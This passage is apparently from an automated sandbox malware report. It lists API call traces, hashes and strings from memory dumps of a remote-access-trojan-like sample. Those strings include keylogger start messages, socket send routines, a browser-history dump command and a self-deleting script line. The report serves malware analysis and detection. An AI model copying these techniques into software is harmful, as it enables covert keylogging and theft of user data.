                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                • _free.LIBCMT ref: 0044E1A0
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 007CE3AB
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007CE3CE
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007CE3F4
                                                                                • _free.LIBCMT ref: 007CE407
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007CE416
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                • Instruction ID: 0ddf67b54fc2070b7f438e8901bc75e2d75f96d1a8ff611f9c5c248101b58eb3
                                                                                • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                • Instruction Fuzzy Hash: 42018472605795BB272516B66C8CE7F7B6DDEC2FA1315013DFD04C3202EA69CD0291B1
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                                                                                • _free.LIBCMT ref: 00446F7D
                                                                                • _free.LIBCMT ref: 00446FA4
                                                                                • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                                                                                • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,007BAA29,00000000,?,?,007BAAAD,00000000,00000000,00000000,00000000,00000000,00000000,00782E6F,?), ref: 007C71AF
                                                                                • _free.LIBCMT ref: 007C71E4
                                                                                • _free.LIBCMT ref: 007C720B
                                                                                • SetLastError.KERNEL32(00000000), ref: 007C7218
                                                                                • SetLastError.KERNEL32(00000000), ref: 007C7221
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction ID: 1ec3e30190d09aef83f92c0ea65adeef859f1e2349bce607972544a6fd6bd28d
                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction Fuzzy Hash: 0901863624C705A7861A26347C89F2F2B6DEBC1771729013DF519E2192EE7DCD01D915
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                • String ID:
                                                                                • API String ID: 2951400881-0
                                                                                • Opcode ID: 28db66d1b44df5a4a13f2ee1d3f58b4d8ccd2cd96a3d097fa0993d4b776b664c
                                                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                • Opcode Fuzzy Hash: 28db66d1b44df5a4a13f2ee1d3f58b4d8ccd2cd96a3d097fa0993d4b776b664c
                                                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0079B5FC
                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0079B60F
                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0079B62F
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0079B63A
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0079B642
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                • String ID:
                                                                                • API String ID: 2951400881-0
                                                                                • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                • Instruction ID: d81eab114a555c6ea10489bcddd36636285de80e46485722dc1bf24e16e0099a
                                                                                • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                • Instruction Fuzzy Hash: 8BF02871204315ABEB116798BD4EF7BB26CDB84B92F100076F616D21A2EFB4EC814676
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0044F7B5
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 0044F7C7
                                                                                • _free.LIBCMT ref: 0044F7D9
                                                                                • _free.LIBCMT ref: 0044F7EB
                                                                                • _free.LIBCMT ref: 0044F7FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                APIs
                                                                                • _free.LIBCMT ref: 007CFA1C
                                                                                  • Part of subcall function 007C6D2C: HeapFree.KERNEL32(00000000,00000000,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?), ref: 007C6D42
                                                                                  • Part of subcall function 007C6D2C: GetLastError.KERNEL32(?,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?,?), ref: 007C6D54
                                                                                • _free.LIBCMT ref: 007CFA2E
                                                                                • _free.LIBCMT ref: 007CFA40
                                                                                • _free.LIBCMT ref: 007CFA52
                                                                                • _free.LIBCMT ref: 007CFA64
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction ID: d1d45bdb751f341cba2b64f8a109d533acf202353124a5898f04c56274caa11c
                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction Fuzzy Hash: 68F0B232605604EB8A64EB64F8C5E1AB7EBEA05710794982DF44DD7551CB3AFCC0C654
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                • String ID: (FG
                                                                                • API String ID: 3142014140-2273637114
                                                                                • Opcode ID: b66b3e9f27bfc03711d62459d1c25f5097fb36fde86d135e8370824b6e749363
                                                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                • Opcode Fuzzy Hash: b66b3e9f27bfc03711d62459d1c25f5097fb36fde86d135e8370824b6e749363
                                                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007969CF
                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00796A01
                                                                                • IsWindowVisible.USER32(?), ref: 00796A08
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0079B5FC
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0079B60F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                • String ID: (FG
                                                                                • API String ID: 3142014140-2273637114
                                                                                • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                • Instruction ID: ae05cbd45c510eab84bd40755fd61f3c9660941beaf7a432bdc38e902456dbda
                                                                                • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                • Instruction Fuzzy Hash: 7C711931588244DEC365FB24D969EEFB3A4EF94301F50452DF58A82163EF386A4ACB52
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00792C84
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00792CB3
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00792D54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$InfoQueryValue
                                                                                • String ID: DG
                                                                                • API String ID: 3554306468-2560412334
                                                                                • Opcode ID: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                                                • Instruction ID: 9312e035d5650cfac82ca10c693f39f7c20c43d55497f9df90b45624a546c0bd
                                                                                • Opcode Fuzzy Hash: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                                                • Instruction Fuzzy Hash: AA510F72148344EFD311FB64D849DABB7ECEF84700F50492EB695D2152EB78EA09CB62
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,006BB748,00000010), ref: 004042A5
                                                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                • String ID: XCG$`AG$>G
                                                                                • API String ID: 2334542088-2372832151
                                                                                • Opcode ID: 32483e4998e3cf9ddc1f2833a18731a690a227b543fb70c909ebd3c703c2f8ba
                                                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                • Opcode Fuzzy Hash: 32483e4998e3cf9ddc1f2833a18731a690a227b543fb70c909ebd3c703c2f8ba
                                                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00789868
                                                                                  • Part of subcall function 00784458: socket.WS2_32(006AF6E0,00000001,00000006), ref: 00784479
                                                                                  • Part of subcall function 007844F3: connect.WS2_32(?,00000000,00000000), ref: 0078450C
                                                                                  • Part of subcall function 0079B911: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,007898F0,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0079B926
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                • String ID: XCG$`AG$>G
                                                                                • API String ID: 2334542088-2372832151
                                                                                • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                • Instruction ID: d0e1531ab47ffbb4993f98a2d21c3ce7578752ed7bed8f88c6a1475d4eb5dcbb
                                                                                • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                • Instruction Fuzzy Hash: 01513231688244DFC369F724D869AEFB395EF94301F50482DF54A82193EE38994BCB56
                                                                                APIs
                                                                                • connect.WS2_32(?,00000000,00000000), ref: 0078450C
                                                                                • WSAGetLastError.WS2_32(?,?,?,00781B92), ref: 0078464E
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocalTimeconnect
                                                                                • String ID: Connection Failed: $TLS Handshake... |
                                                                                • API String ID: 227477821-1510355367
                                                                                • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                • Instruction ID: c5fca7cb4f8c7de71bf3e0e5a1a21a242757439ba5f29aa61b0f67b7dbf7346f
                                                                                • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                • Instruction Fuzzy Hash: B6415731F80702F78A14B779880FA2D7A55AB82350F600259F90243693FE9DAC2587E7
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,0046BA00,00000000,00000000,00000000), ref: 007968C3
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • Sleep.KERNEL32(00000064), ref: 007968EF
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00796923
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                • String ID: /t
                                                                                • API String ID: 1462127192-3161277685
                                                                                • Opcode ID: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                                                • Instruction ID: a81d6545fbef6c772ed4b4934cafdeac9b5c3b70a5a5a6ffecd5c70ec0ff2b2f
                                                                                • Opcode Fuzzy Hash: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                                                • Instruction Fuzzy Hash: 52318531980209DADB18FBA0DC9AEED7734EF10301F404169F50667192EF685A8BCB95
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                                                • API String ID: 368326130-2663660666
                                                                                • Opcode ID: 92b2a62b301968a25cd18ab096c84259c1ee9d5757000a7c8e4b107e00246b2b
                                                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                • Opcode Fuzzy Hash: 92b2a62b301968a25cd18ab096c84259c1ee9d5757000a7c8e4b107e00246b2b
                                                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                APIs
                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateExecuteExitFileProcessShell
                                                                                • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                • API String ID: 2309964880-3562070623
                                                                                • Opcode ID: 639022876ca2f318e6976af5514e86a7c38dc019822f533f7746c7bdc912c011
                                                                                • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                • Opcode Fuzzy Hash: 639022876ca2f318e6976af5514e86a7c38dc019822f533f7746c7bdc912c011
                                                                                • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                • String ID: Offline Keylogger Started
                                                                                • API String ID: 465354869-4114347211
                                                                                • Opcode ID: d710148bde6815176e432de5b69a9c8f16e0e0b194596ed465d52d43a9505855
                                                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                • Opcode Fuzzy Hash: d710148bde6815176e432de5b69a9c8f16e0e0b194596ed465d52d43a9505855
                                                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0078AAEB
                                                                                • wsprintfW.USER32 ref: 0078AB6C
                                                                                  • Part of subcall function 00789FBF: SetEvent.KERNEL32(00000000,?,00000000,0078AB83,00000000), ref: 00789FEB
                                                                                Strings
                                                                                • [%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0078AAF4
                                                                                • Offline Keylogger Started, xrefs: 0078AAE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventLocalTimewsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
                                                                                • API String ID: 1497725170-184404310
                                                                                • Opcode ID: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                                                • Instruction ID: f701649596e08578d86d1393c6a380ff57f70b07378b2747091e4a1d4dfb77b2
                                                                                • Opcode Fuzzy Hash: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                                                • Instruction Fuzzy Hash: 23119372544118FACB18FB54EC59CFE77B8AE44312B00412AF40296182FF7C5A86C7B5
                                                                                APIs
                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
